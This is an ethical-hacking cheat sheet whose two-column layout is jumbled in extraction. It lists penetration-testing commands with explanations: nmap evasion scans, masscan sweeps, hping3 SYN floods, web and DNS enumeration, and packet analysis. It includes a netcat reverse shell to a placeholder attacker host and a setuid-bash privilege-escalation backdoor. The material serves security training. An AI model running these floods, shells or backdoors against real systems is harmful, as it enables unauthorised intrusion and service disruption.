TOP HACKING

COMMANDS
CHEAT SHEET

ping 192.168.0.1 nmap -sL 192.168.1.0/24

Sends ICMP echo requests to 192.168.0.1 to check connectivity and measure response Lists each IP in the 192.168.1.0/24 subnet without sending any packets to them. It's used
time. Used in ethical hacking for initial reconnaissance to verify if the target system is for planning or documentation purposes, especially in large networks.
reachable.

nmap --script vuln 192.168.1.1

ping -s 1300 172.18.0.11
Executes Nmap's vulnerability detection scripts against 192.168.1.1. This automated
This command sends ICMP echo requests with a packet size of 1300 bytes to 172.18.0.11.
approach helps identify known vulnerabilities that can be exploited.
It's useful for testing how a network or host handles larger packets, which could help in
identifying misconfigurations or vulnerabilities related to fragmentation.
nmap --script malware 192.168.1.1

ping -s 1300 -f 172.18.0.11

Scans 192.168.1.1 with Nmap scripts designed to detect malware infections. It's a quick
way to check if a host is compromised.
Sends flood pings with large packets (1300 bytes) to 172.18.0.11. The f option sends
packets as fast as possible, which can be used to stress test the network components
of the target and check for DoS vulnerabilities.
nmap -A 192.168.1.1

Performs an aggressive scan on 192.168.1.1 that includes OS and version detection, script
iftop
scanning, and traceroute. It's a comprehensive scan for gathering detailed information
Displays bandwidth usage on network interfaces in real-time. Ethical hackers use it to about a target.
monitor network traffic for anomalies that could indicate malicious activity or to assess the
impact of their testing on network bandwidth.
nmap -f 192.168.1.0/24

hping3 -S --flood -V -p 80 172.18.0.11 Scans the 192.168.1.0/24 subnet with fragmented packets, which can help evade some
IDS/IPS systems. It's used for stealthier scanning.
Sends SYN packets to port 80 of 172.18.0.11 at high speed (-flood), simulating a SYN flood
attack. The S flag sets the SYN flag, V enables verbose mode, and p 80 specifies the target
nmap --source-port 53 192.168.1.0/24
port. This command is used for testing the resilience of the target against SYN flood
attacks.
Scans 192.168.1.0/24 using a source port of 53, mimicking DNS traffic. This can bypass
certain firewall rules that allow DNS traffic.
hping3 --traceroute -V -1 example.com

Performs a traceroute to example.com using ICMP packets (1), with verbose output (V). nmap -D RND:10 192.168.1.0/24
This is used to map the route packets take to the target, which can help identify firewalls,
Scans 192.168.1.0/24 using decoy traffic from random IPs (RND:10), making it difficult to
routers, and other network devices.
identify the true source of the scan. It's used for anonymizing the scan source.

ptunnel
masscan -p80,443,22 10.77.14.0/24 --rate=1000
Establishes a tunnel encapsulated within ICMP echo requests and replies. Ethical hackers
might use this to bypass network restrictions or for covert communications during Scans 10.77.14.0/24 for open ports 80, 443, and 22 at a rate of 1000 packets per second.
penetration testing. Masscan is used for very fast scans over large networks or subnets.

masscan 10.0.0.0/8 -p0-65535 --rate=10000

tcpdump -i any icmp

Scans the entire 10.0.0.0/8 range for all possible ports at a high packet rate,
Captures ICMP packets across all network interfaces. This command is useful for
demonstrating Masscan's capability for rapid, wide-scale scanning.
monitoring and analyzing ICMP traffic for suspicious activities like ping sweeps or
network mapping attempts.
masscan -p80,443 10.0.0.0/8 --rate=1000 --randomize-hosts

grep -Hnri 'tree' | vim -

Scans the entire 10.0.0.0/8 range for all possible ports at a high packet rate,
demonstrating Masscan's capability for rapid, wide-scale scanning.
Searches recursively (r), ignoring case (i), and in all files from the current directory for the
string "tree", showing line numbers (n) and file names (H). The output is then piped into
vim for editing. This could be used to search through code or configuration files for masscan -p23 10.0.0.0/8 --rate=10000
specific entries related to vulnerabilities or configurations.
Specifically targets port 23 (Telnet) across the 10.0.0.0/8 range at a high rate. It's used for

:%!sort quickly identifying potentially vulnerable Telnet services.

This command is used within vim, the text editor, to sort the lines of the currently open
sl
file. It can be useful for organizing data, such as IP addresses or URLs, during the analysis
phase of ethical hacking. A playful command that shows a steam locomotive animation across the terminal. While
not directly related to ethical hacking, it can be a humorous way to remind oneself or

:%!grep -v .git others not to mistype ls for listing directory contents.

Another vim command that filters out lines containing .git from the currently open file,
alias ls="cat /dev/urandom"
using grep -v which inverts the match. This can be helpful to exclude version control
directories from text search results in configuration or documentation files. Sets an alias for the ls command to execute cat /dev/urandom instead, causing random
data to be displayed whenever ls is typed. This command is more of a practical joke and
should be used cautiously, as it overrides the default behavior of a commonly used
nmap -sn 192.168.1.0/24
command.

Performs a ping scan on the 192.168.1.0/24 subnet, identifying live hosts without actually
scanning ports. It's a basic reconnaissance tool for mapping network structure. whois microsoft.com

Retrieves WHOIS information for microsoft.com, providing details like registration,

nmap -sV 192.168.1.1
ownership, and administrative contacts. Used in reconnaissance for gathering intelligence
about domain ownership.
Scans `192.168.1.1` to identify service versions on open ports. This information is crucial
for discovering vulnerable software versions that can be exploited.
whatweb networkchuck.coffee

nmap -O 192.168.1.1
Identifies technologies used on the networkchuck.coffee website, such as web server
software, CMS, JavaScript libraries, etc. It's useful for pre-attack planning by identifying
Attempts to identify the operating system of 192.168.1.1 based on characteristics of its
potential software vulnerabilities.
network behaviors. This helps in tailoring further attacks to the specific OS vulnerabilities.

nmap -Pn 192.168.1.1

Scans 192.168.1.1 without trying to ping it first, useful when the target may be blocking
ICMP echo requests. It allows for stealthier scanning.
curl -i <https://networkchuck.hackwithnahamsec.com> tcpdump -r capture_file.pcap

Sends a HTTP GET request to https://networkchuck.hackwithnahamsec.com, displaying Reads packets from a pcap file (capture_file.pcap), allowing for offline analysis of
the full HTTP response headers (i option). This command is useful for web captured network traffic. This is useful for deep dives into specific network events or
reconnaissance, allowing ethical hackers to gather information about the web server, incidents.
including software versions and cookies.

tcpdump -i eth0 -c 100

curl -i <https://networkchuck.hackwithnahamsec.com> -H 'X-API-TOKEN: <api token>'

Captures the first 100 packets on the eth0 interface, limiting the capture to a manageable
Sends a HTTP GET request with a custom header X-API-TOKEN for authentication. This is
number of packets for quick analysis or demonstration purposes.
often used in API testing to ensure that protected endpoints are secure and accessible
only with correct authentication tokens.
tshark -V -c 1 -i eth0

nikto networkchuck.coffee Captures and displays verbose information about a single packet on the eth0 interface.
Tshark, being the command-line version of Wireshark, is useful for detailed analysis of
Performs a comprehensive web server scan against networkchuck.coffee to detect
packets in terminal environments.
dangerous files, outdated server software, and other vulnerabilities. Nikto is used for web
application security testing.
tshark -Y'http.request.method == "GET"' -i eth0

gobuster dir -u <https://networkchuck.com> -w

Filters and captures HTTP GET requests on the eth0 interface. This command is
/usr/share/wordlists/dirbuster/directory-list-2.3-small.txt
particularly useful for analyzing web traffic and identifying potentially malicious or
unauthorized requests.
Uses brute force to enumerate directories and files on https://networkchuck.com using a
specific wordlist. Gobuster helps find hidden resources that were not intended to be
publicly accessible. timeout

This command is used to run a specified command with a time limit, after which it will be
apt install seclists
terminated if still running. It's a control mechanism for ensuring that long-running
commands do not exceed a desired execution time, useful in both scripted and
Installs the seclists package, which contains a collection of pre-compiled wordlists for
interactive ethical hacking scenarios.
different security assessments including passwords, fuzzing payloads, and directories
enumeration.
tshark -r capture.pcap -qz endpoints,ip

wget
Analyzes a pcap file (capture.pcap) to summarize IP endpoints statistics, providing
<https://github.com/danielmiessler/SecLists/raw/master/Discovery/DNS/dns-Jhaddix.txt>
insights into the communication patterns, potential data exfiltration attempts, or network
scans.
Downloads a specific DNS enumeration wordlist from the SecLists GitHub repository. This
wordlist is used for discovering subdomains and other DNS related reconnaissance.
tshark -r capture.pcap -q -z follow,tcp,ascii,0
gobuster dns -d networkchuck.com -w dns-jhaddix.txt
Follows the stream of the first TCP conversation in a pcap file in ASCII, helping to
Conducts DNS subdomain enumeration on networkchuck.com using the dns-Jhaddix.txt reconstruct the content of sessions or detect malicious communications within captured
wordlist. It's a method for discovering subdomains that might reveal additional attack traffic.
surfaces.

tshark -e ip.src -e ip.dst -e frame.protocols -T fields -r capture.pcap

sublist3r
Extracts source IP, destination IP, and protocol information from packets in a pcap file,
A tool used for fast subdomain enumeration, gathering data from search engines, outputting the data in a field-based format. This is useful for quickly parsing and
websites, and DNS servers. It helps in uncovering additional domains associated with the analyzing specific details of network traffic.
target for further exploration and vulnerability assessment.

tmux
wpscan --url chuckkeith.com --enumerate u
Terminal multiplexer that allows multiple terminal sessions to be accessed simultaneously
Scans the WordPress site at chuckkeith.com for user enumeration, attempting to list user within a single window. Ethical hackers use it to manage multiple command-line tasks
accounts. This information can be used for brute force attacks or phishing campaigns. efficiently during testing or when exploiting vulnerabilities.

wpscan --url chuckkeith.com --enumerate p tmux new -s bob

This command uses WPScan, a WordPress vulnerability scanner, to enumerate installed Creates a new tmux session named "bob". This allows an ethical hacker to organize their
plugins on the website chuckkeith.com. This is crucial for ethical hackers to identify work in named sessions, making it easier to manage complex tasks.
potentially vulnerable plugins that could be exploited.

tmux a
wpscan --url <http://example.com> --enumerate vp,vt --plugins-detection aggressive
Attaches to the last tmux session. Useful for returning to a previously detached session,
Runs WPScan against http://example.com to aggressively enumerate vulnerable plugins ensuring continuity in the ethical hacking process.
(vp) and themes (vt), potentially uncovering security weaknesses. The aggressive
detection mode increases the chance of finding hidden or less obvious components. ssh [email protected]

amass enum -passive -d example.com Initiates an SSH connection to 192.168.1.1 with the username networkchuck. SSH is used
by ethical hackers for secure, encrypted communications with targets during
Executes a passive domain enumeration for example.com using the Amass tool. This assessments or for establishing secure channels for further exploitation.
method gathers information without directly interacting with the target's web servers,
reducing the risk of detection. It's useful for mapping out a target's external attack surface. ssh user@remote_host 'command_to_run'

amass enum -passive -d networkchuck.com Executes a specific command on remote_host via SSH as user. This allows ethical hackers
to remotely execute commands on a target system, which can be part of exploitation or
Similar to the previous command, this performs passive enumeration of the domain post-exploitation phases.
networkchuck.com, collecting data from public sources to identify associated
subdomains and IPs without alerting the target.
ssh -D 1337 -C -q -N [email protected]

git Establishes an SSH connection to 172.234.88.97 as root, creating a dynamic SOCKS proxy
on local port 1337 (D 1337), with compression (C), in quiet mode (q), without executing a
This entry refers to using Git, a version control system, for cloning repositories such as remote command (N). This can be used for secure, anonymous browsing through the
exploit databases or tools useful in ethical hacking. For example, cloning a repository of target, or to bypass network restrictions during ethical hacking assessments.
exploits can provide an ethical hacker with resources to test systems for vulnerabilities.

nc reverse shell
searchsploit
`nc -e /bin/sh <attacker_ip> 1234`: Establishes a reverse shell connection from the target

A command-line search tool for Exploit Database, allowing users to search for known to the attacker's machine (`<attacker_ip>`) on port `1234`, executing `/bin/sh` for shell

vulnerabilities and exploits. Ethical hackers use it to find exploits for identified access. This command leverages `netcat (nc)` for backdoor access into the target system.

vulnerabilities in systems or applications. Commands like searchsploit wordpress plugins `nc -lvp 1234`: Listens on port `1234` for incoming connections, typically used by the
or searchsploit ssh are examples of how it can be used to narrow down searches for attacker to receive the reverse shell from the target. The `l` option listens for an incoming
specific targets. connection, `v` is for verbose output, and `p` specifies the port.

/bin/bash -p nc simple chat server

Invokes a new Bash shell with the p option, which preserves the effective UID and GID `nc -lvp 1234`: Sets up a listener on port `1234` that could act as a simple chat server.
privileges. This can be used in privilege escalation scenarios when a script or program This demonstrates the versatility of `netcat` for creating quick and temporary network
with setuid is exploited to retain elevated privileges. services.
`nc -v <ipaddress> 1234`: Connects to the chat server hosted on `<ipaddress>` at port
`1234`. This showcases `netcat`'s ability to be used for straightforward client-server
sudo chmod +s /bin/bash
communication setups.

Applies the setuid bit (+s) on /bin/bash, making it run with the privileges of the file's
owner (typically root) for any user who executes it. This command is a classic example of
a privilege escalation technique, allowing a low-privileged user to gain root access
through a new shell instance.

tcpdump -w capture.pcap -i eth0

Captures network traffic on the eth0 interface and writes it to a file named capture.pcap.
This is a fundamental technique for capturing and analyzing network packets to detect
anomalies or malicious activities.